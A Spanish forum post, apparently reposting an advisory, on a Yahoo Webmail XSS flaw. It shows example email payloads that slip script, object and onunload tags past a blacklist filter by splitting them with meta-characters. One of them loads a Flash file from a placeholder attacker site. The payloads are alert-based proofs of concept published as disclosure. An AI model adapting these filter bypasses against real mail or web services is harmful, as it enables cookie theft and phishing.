Suscripción al boletín mensual de elhacker.net
Autor
1) XSS/Robo de cookie
El fallo de las blacklist de Yahoo para detectar script-tags en combinacion con caracteres especiales de NULL-Bytes y otros META-Caracteres.
Esto deja a los usuarios del Webmail usando MSIE vulnerables a XSS, troyanos y a los ataques de Phishing.
2) Ejemplos de algunos XSS
Extracto de Correos-HTML:
Código:
SCRIPT-TAG:
----------------------------------------------------------------
HOLA
<s[META-Char]cript>alert("Mousehack Was Here")</s[META-Char]cript>
rrrrrrxxxxx
-----------------------------------------------------------------
----------------------------------------------------------------
HOLA
<s[META-Char]cript>alert("Mousehack Was Here")</s[META-Char]cript>
rrrrrrxxxxx
-----------------------------------------------------------------
Código:
OBJECT-TAG:
-----------------------------------------------------------------
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000">
<param name="movie" value="http://[tu_sitio]/yahoo.swf"></obje[META-Char]ct>
------------------------------------------------------------------
-----------------------------------------------------------------
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000">
<param name="movie" value="http://[tu_sitio]/yahoo.swf"></obje[META-Char]ct>
------------------------------------------------------------------
Código:
ONUNLOAD-Attribute:
------------------------------------------------------------------
</body><body onun[META-Char]load=alert('Mousehack Was Here')>
somewords
</body></html>
-------------------------------------------------------------------
------------------------------------------------------------------
</body><body onun[META-Char]load=alert('Mousehack Was Here')>
somewords
</body></html>
-------------------------------------------------------------------
Solucion:
No usar Internet Explorer
Fuente:securlabs.org
Salu2
En línea
